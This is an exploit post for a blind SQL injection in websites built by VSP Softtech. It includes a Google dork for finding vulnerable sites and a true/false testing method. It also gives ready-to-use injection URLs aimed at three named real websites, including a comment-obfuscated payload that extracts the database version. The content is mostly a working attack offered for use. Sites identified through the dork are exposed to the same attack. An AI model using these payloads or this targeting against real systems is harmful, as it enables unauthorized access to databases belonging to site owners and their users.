*********************************************************
#Exploit Title: VSP Softtech - Blind Sql Injection
#Date: 2024-05-16
#Exploit Author: Behrouz Mansoori
#Google Dork: "Developed by VSP Softtech"
#Category:webapps
#Tested On: Mac, Firefox
[+] First add "and true" and then "and false" to the end of the link :
* Target.com/index.php?lang=1 true
* Target.com/index.php?lang=1 false
### Demo 1:
* https://indupharma.co.in/product-detail.php?id=96%27%20and%20true--+
* https://indupharma.co.in/product-detail.php?id=96%27%20and%20false--+
* https://indupharma.co.in/product-detail.php?id=96%27%20/*!12345and*/%20/*!12345substring(@@version,1,1)*/=5--+
### Demo 2:
* https://waterlia.com/list_profile.php?id=1%27%20and%20true--+
* https://waterlia.com/list_profile.php?id=1%27%20and%20false--+
* https://waterlia.com/list_profile.php?id=1%27%20/*!12345and*/%20/*!12345substring(@@version,1,1)*/=5--+
### Demo 3:
* https://www.rajpathacademy.com/eng/book-details.php?id=173%27%20and%20true--+
* https://www.rajpathacademy.com/eng/book-details.php?id=173%27%20and%20false--+
* https://www.rajpathacademy.com/eng/book-details.php?id=173%27%20/*!12345and*/%20/*!12345substring(@@version,1,1)*/=5--+
*********************************************************
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: mr.mansoori@yahoo.com
*********************************************************